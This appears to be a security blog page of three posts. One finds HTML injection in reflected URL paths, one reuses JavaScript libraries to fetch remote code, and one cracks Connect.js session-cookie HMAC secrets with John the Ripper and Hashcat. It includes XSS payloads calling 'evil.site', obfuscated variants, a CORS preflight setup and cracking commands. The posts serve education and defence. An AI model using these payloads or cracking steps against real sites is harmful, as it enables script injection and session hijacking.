• Trail Ends

    URLs guide us through the trails among web apps. We follow their components – schemes, hosts, ports, querystrings – like breadcrumbs. They lead to the bright meadows of content. They lead to the dark thickets of forgotten pages. Our browsers must recognize when those crumbs take us to infestations of malware and phishing.

    And developers must recognize how those crumbs lure dangerous beasts to their sites.

    The apparently obvious components of URLs (the aforementioned origins, paths, and parameters) entail obvious methods of testing. Phishers squat on FQDN typos and IDN homoglyphs. Other attackers guess alternate paths, looking for /admin directories and backup files. Others deliver SQL injection and HTML injection (aka cross-site scripting) payloads into querystring parameters.

    But URLs are not always what they seem. Forward slashes don’t always denote directories. Web apps might decompose a path into parameters passed into backend servers. Hence, it’s important to pay attention to how apps handle links.

    A common behavior for web apps is to reflect URLs within pages. In the following example, we’ve requested a link, https://web.site/en/dir/o/80/loch, which shows up in the HTML response like this:

    <link rel="canonical" href="https://web.site/en/dir/o/80/loch" />

    There’s no querystring parameter to test, but there’s still plenty of items to manipulate. Imagine a mod_rewrite rule that turns ostensible path components into querystring name/value pairs. A link like https://web.site/en/dir/o/80/loch might become https://web.site/en/dir?o=80&foo=loch within the site’s nether realms.

    We can also dump HTML injection payloads directly into the path. The URL shows up in a quoted string, so the first step could be trying to break out of that enclosure:


    The app neglects to filter the payload although it does transform the quotation marks with HTML encoding. There’s no escape from this particular path of injection:

    <link rel="canonical" href="https://web.site/en/dir/o/80/loch&quot;onmouseover=alert(9);&quot;" />

    However, if you’ve been reading here often, then you’ll know by now that we should keep looking. If we search further down the page a familiar vuln scenario greets us. (As an aside, note the app’s usage of two-letter language codes like en and de; sometimes that’s a successful attack vector.) As always, partial security is complete insecurity.

    <div class="list" onclick="Culture.save(event);" > <a href="/de/dir/o/80/loch"onmouseover=alert(9);"?kosid=80&type=0&step=1">Deutsch</a> </div>

    We probe the injection vector and discover that the app redirects to an error page if characters like < or > appear in the URL:

    Please tell us ([email protected]) how and on which page this error occurred.

    The error also triggers on invalid UTF-8 sequences and NULL (%00) characters. So, there’s evidence of some filtering. That basic filter prevents us from dropping in a <script> tag to load external resources. It also foils character encoding tricks to confuse and bypass the filters.

    Popular HTML injection examples have relied on <script> tags for years. Don’t let that limit your creativity.

    Remember that the rise of sophisticated web apps has meant that complex JavaScript libraries like jQuery have become pervasive. Hence, we can leverage JavaScript that’s already present to pull off attacks like this:


    <div class="list" onclick="Culture.save(event);" > <a href="/de/dir/o/80/loch"onmouseover=$.get("//evil.site/");"?kosid=80&type=0&step=1">Deutsch</a> </div>

    We’re still relying on the mouseover event and therefore need the victim to interact with the web page to trigger the payload’s activity. The payload hasn’t been injected into a form field, so the HTML5 autofocus/onfocus trick won’t work.

    We could further obfuscate the payload in case some other kind of filter is present:

    https://web.site/en/dir/o/80/loch"onmouseover=$\["get"\]("//evil.site/");" https://web.site/en/dir/o/80/loch"onmouseover=$\["g"%2b"et"\]("htt"%2b"p://"%2b"evil.site/");"

    Parameter validation and context-specific output encoding are two primary countermeasures for HTML injection attacks. The techniques complement each other; effective validation prevents malicious payloads from entering an app, correct encoding prevents a payload from changing a page’s DOM. With luck, an error in one will be compensated by the other. But it’s a bad idea to rely on luck, especially when there are so many potential errors to make.

    Two weaknesses enable attackers to shortcut what should be secure paths through a web app:

    • Validation routines must be applied to all incoming data, not just parameters. Form fields and querystring parameters may be the most notorious attack vectors, but they’re not the only ones. Request headers and URL components are just as easy to manipulate.
    • Deny lists fail because developers don’t anticipate the various ways of crafting exploits. Even worse are filters built solely from observing automated tools, which leads to naive defenses like blocking alert or <script>.

    Output encoding must be applied consistently. It’s one thing to have designed a strong function for inserting text into a web page; it’s another to make sure it’s implemented throughout the app. Attackers are going to follow these breadcrumbs through your app.

    Be careful, lest they eat a few along the way.

    • • •
  • Thief PHB

    In 1st edition AD&D two character classes had their own private languages: Druids and Thieves. Thus, a character could speak in Thieves’ Cant to identify peers, bargain, threaten, or otherwise discuss malevolent matters with a degree of secrecy. (Of course, Magic-Users had that troublesome first level spell comprehend languages, and Assassins of 9th level or higher could learn secret or alignment languages forbidden to others.)

    Thieves rely on subterfuge (and high DEX) to avoid unpleasant ends. Shakespeare didn’t make it into the list of inspirational reading in Appendix N of the DMG. Even so, consider in Henry VI, Part II, how the Duke of Gloucester (later to be Richard III) defends his treatment of certain subjects, with two notable exceptions:

    Unless it were a bloody murderer,

    Or foul felonious thief that fleec’d poor passengers,

    I never gave them condign punishment.

    Developers have their own spoken language for discussing code and coding styles. They litter conversations with terms of art like patterns and anti-patterns, which serve as shorthand for design concepts or litanies of caution. One such pattern is Don’t Repeat Yourself (DRY), of which Code Reuse is a lesser manifestation.

    Hackers code, too.

    The most boring of HTML injection examples is to display an alert() message. The second most boring is to insert the document.cookie value into a request. But this is the era of HTML5 and roses; hackers need look no further than a vulnerable Same Origin to find useful JavaScript libraries and functions.

    There are two important reasons for taking advantage of DRY in a web hack:

    1. Avoid inadequate deny lists (which is really a redundant term).
    2. Leverage code that already exists.

    Keep in mind that none of the following hacks are flaws of their respective JavaScript library. The target is assumed to have an HTML injection vulnerability – our goal is to take advantage of code already present on the hacked site in order to minimize our effort.

    For example, imagine an HTML injection vulnerability in a site that uses the AngularJS library. The attacker could use a payload like:

    angular.bind(self, alert, 9)()

    In Ember.js the payload might look like:

    Ember.run(null, alert, 9)

    The pervasive jQuery might have a string like:


    And the Underscore library might be leveraged with:

    _.defer(alert, 9)

    These are nice tricks. They might seem to do little more than offer fancy ways of triggering an alert() message, but the code is trivially modifiable to a more lethal version worthy of a vorpal blade.

    More importantly, these libraries provide the means to load – and execute! – JavaScript from a different origin. After all, browsers don’t really know the difference between a CDN and a malicious domain.

    The jQuery library provides a few ways to obtain code:

    $.get('//evil.site/') $('#selector').load('//evil.site')

    Prototype has an Ajax object. It will load and execute code from a call like:

    new Ajax.Request('//evil.site/')

    But this has a catch: the request includes “non-simple” headers via the XHR object and therefore triggers a CORS pre-flight check in modern browsers. An invalid pre-flight response will cause the attack to fail. Cross-Origin Resource Sharing is never a problem when you’re the one sharing the resource.

    In the Prototype Ajax example, a browser’s pre-flight might look like the following. The initiating request comes from a link we’ll call https://web.site/xss_vuln.page.

    OPTIONS https://evil.site/ HTTP/1.1
    Host: evil.site
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Gecko/20100101 Firefox/23.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Origin: https://web.site
    Access-Control-Request-Method: POST
    Access-Control-Request-Headers: x-prototype-version,x-requested-with
    Connection: keep-alive
    Pragma: no-cache
    Cache-Control: no-cache
    Content-length: 0

    As someone with influence over the content served by evil.site, it’s easy to let the browser know that this incoming cross-origin XHR request is perfectly fine. Hence, we craft some code to respond with the appropriate headers:

    HTTP/1.1 200 OK Date: Tue, 27 Aug 2013 05:05:08 GMT
    Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.1e DAV/2 SVN/1.7.10 PHP/5.3.26
    Access-Control-Allow-Origin: https://web.site
    Access-Control-Allow-Methods: GET, POST
    Access-Control-Allow-Headers: x-json,x-prototype-version,x-requested-with
    Access-Control-Expose-Headers: x-json
    Content-Length: 0
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=utf-8

    With that out of the way, the browser continues its merry way to the cursed resource. We’ve done nothing to change the default behavior of the Ajax object, so it produces a POST. (Changing the method to GET would not have avoided the CORS pre-flight because the request would have still included custom X- headers.)

    POST https://evil.site/HWA/ch2/cors_payload.php HTTP/1.1
    Host: evil.site
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Gecko/20100101 Firefox/23.0
    Accept: text/javascript, text/html, application/xml, text/xml, \*/\*
    Accept-Language: en-US,en;q=0.5
    X-Requested-With: XMLHttpRequest
    X-Prototype-Version: 1.7.1
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Referer: https://web.site/HWA/ch2/prototype_xss.php
    Content-Length: 0
    Origin: https://web.site
    Connection: keep-alive
    Pragma: no-cache
    Cache-Control: no-cache

    Finally, our site responds with CORS headers intact and a payload to be executed. We’ll be even lazier and tell the browser to cache the CORS response so it’ll skip subsequent pre-flights for a while.

    HTTP/1.1 200 OK Date: Tue, 27 Aug 2013 05:05:08 GMT
    Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.1e DAV/2 SVN/1.7.10 PHP/5.3.26
    X-Powered-By: PHP/5.3.26
    Access-Control-Allow-Origin: https://web.site
    Access-Control-Allow-Methods: GET, POST
    Access-Control-Allow-Headers: x-json,x-prototype-version,x-requested-with
    Access-Control-Expose-Headers: x-json
    Access-Control-Max-Age: 86400
    Content-Length: 10
    Keep-Alive: timeout=5, max=99
    Connection: Keep-Alive
    Content-Type: application/javascript; charset=utf-8

    Okay. So, it’s another alert() message. I suppose I’ve repeated myself enough on that topic for now.

    Find/Remove Traps

    It should be noted that Content Security Policy just might help you in this situation. The catch is that you need to have architected your site to remove all inline JavaScript. That’s not always an easy feat. Even experienced developers of major libraries like jQuery are struggling to create CSP-compatible content. Never the less, auditing and improving code for CSP is a worthwhile endeavor. Even 1st level thieves only have a 20% change to Find/Remove Traps. The chance doesn’t hit 50% until 7th level. Improvement takes time.

    And the price for failure? Well, it turns out condign punishment has its own API.

    • • •
  • No Trespassing

    Oh, the secrets you’ll know if to GitHub you go. The phrases committed by coders exhibited a mistaken sense of security.

    A password ensures, while its secrecy endures, a measure of proven identity.

    Share that short phrase for the public to gaze at repositories open and clear. Then don’t be surprised at the attacker disguised with the secrets you thought were unknown.


    It’s no secret that I gave a BlackHat presentation a few weeks ago. It’s no secret that the CSRF countermeasure we proposed avoids nonces, random numbers, and secrets. It’s no secret that GitHub is a repository of secrets.

    And that’s how I got side-tracked for two days hunting secrets on GitHub when I should have been working on slides.

    Your Secret

    Security that relies on secrets (like passwords) fundamentally relies on the preservation of that secret. There’s no hidden wisdom behind that truism, no subtle paradox to grant it the standing of a koan. It’s a simple statement too often ignored, bent, and otherwise abused.

    It started with research on examples of CSRF token implementations. But the hunt soon diverged from queries for connect.sid to tokens like OAUTH_CONSUMER_SECRET, to ssh:// and mongodb:// schemes. Such beasts of the wild had been noticed – they tend to roam with little hindrance.

    connect.sid extension:js

    Sometimes these beasts leap from cover into the territory of plaintext. Sometimes they remain camouflaged behind hashes and ciphers. Crypto functions conceal the nature of a beast, but the patient hunter will be able to discover it given time.

    The mechanisms used to protect secrets, such as encryption and hash functions, are intended to maximize an attacker’s effort at trying to reverse-engineer the secret. The choice of hash function has no appreciable effect on a dictionary-based brute force attack (at least not until your dictionary or a hybrid-based approach reaches the size of the target keyspace). In the long run of an exhaustive brute force search, a “bigger” hash like SHA-512 would take longer than SHA-256 or MD5. But that’s not the smart way to increase the attacker’s work factor.

    Iterated hashing techniques are more effective at increasing the attacker’s work factor. Such techniques have a tunable property that may be adjusted with regard to the expected cracking speeds of an attacker. For example, in the PBKDF2 algorithm, both the HMAC algorithm and number of rounds can be changed, so an HMAC-SHA1 could be replaced by HMAC-SHA256 and 1,000 rounds could be increased to 10,000. (The changes would not be compatible with each other, so you would still need a migration plan when moving from one setting to another.)

    Of course, the choice of work factor must be balanced with a value you’re willing to encumber the site with. The number of “nonce” events for something like CSRF is far more frequent than the number of “hash” events for authentication. For example, a user may authenticate once in a one-hour period, but visit dozens of pages during that same time.

    Our Secret

    But none of that matters if you’re relying on a secret that’s easy to guess, like default passwords. And it doesn’t matter if you’ve chosen a nice, long passphrase that doesn’t appear in any dictionary if you’ve checked that password into a public source code repository.

    In honor of the password cracking chapter of the upcoming AHTK 4th Edition, we’ll briefly cover how to guess HMAC values.

    We’ll use the Connect JavaScript library for Node.js as a target for this guesswork. It contains a CSRF countermeasure that relies on nonces generated via an HMAC. This doesn’t mean Connect.js implements the HMAC algorithm incorrectly or contains a design error. It just means that the security of an HMAC relies on the secrecy of its password.

    Here’s a snippet of the Connect.js code in action. Note the default secret, keyboard cat.

    ... var app = connect()
          .use(connect.session({ secret: 'keyboard cat' }))

    If you come across a web app that sets a connect.sess or connect.sid cookie, then it’s likely to have been created by this library. And it’s just as likely to be using a bad password for the HMAC. Let’s put that to the test with the following cookies.

    Set-Cookie: connect.sess=s%3AGY4Xp1AWB5PVzYHCANaXHznO.
    PUvao3Y6%2FXxLAG%2Bp4xQEBAcbqMCJPACQUvS2WCfsmKU; Path=/;
    Expires=Fri, 28 Jun 2013 23:13:52 GMT; HttpOnly
    Set-Cookie: connect.sid=s%3ATdF%2FriiKHfdilCTc4W5uAAhy.
    qTtH9ZL5pxgClGbZ0I0E3efJTrdC0jia6YxFh3cWKrU; path=/;
    expires=Fri, 28 Jun 2013 22:51:58 GMT; httpOnly
    Set-Cookie: connect.sid=CJVZnS56R6NY8kenBhhIOq0h.
    0opeJzAPZ3efz0dw5YJrGqVv4Fi%2BWVIThEsGHMRqDw0; Path=/; HttpOnly

    Everyone’s Secret

    John the Ripper is a venerable password guessing tool with ancient roots in the security community. Its rule-based guessing techniques and speed make it a powerful tool for cracking passwords. In this case, we’re just interested in its ability to target the HMAC-SHA256 algorithm.

    First, we need to reformat the cookies into a string that John recognizes. For these cookies, resolve the percent-encoded characters, replace the dot (.) with a hash (#). Some of the cookies contained a JSON-encoded version of the session value, others contained only the session value.


    Next, we unleash John against it. The first step might use a dictionary, such as a words.txt file you might have laying around. (The book covers more techniques and clever use of rules to target password patterns. John’s own documentation can also get you started.)

    $ ./john --format=hmac-sha256 --wordlist=words.txt sids.john

    Review your successes with the --show option.

    $ ./john --show sids.john

    Hashcat is another password guessing tool. It takes advantage of GPU processors to emphasize rate of guesses. It requires a slightly different format for the HMAC-256 input file. The order of the password and salt is reversed from John, and it requires a colon separator.


    Hashcat uses numeric references to the algorithms it supports. The following command runs a dictionary attack against hash algorithm 1450, which is HMAC-SHA256.

    $ ./hashcat-cli64.app -a 0 -m 1450 sids.hashcat words.txt

    Review your successes with the --show option.

    $ ./hashcat-cli64.app --show -a 0 -m 1450 sids.hashcat words.txt

    All sorts of secrets lurk in GitHub. Of course, the fundamental problem is that they shouldn’t be there in the first place. There are many more types of secrets than hashed passphrases, too.

    • • •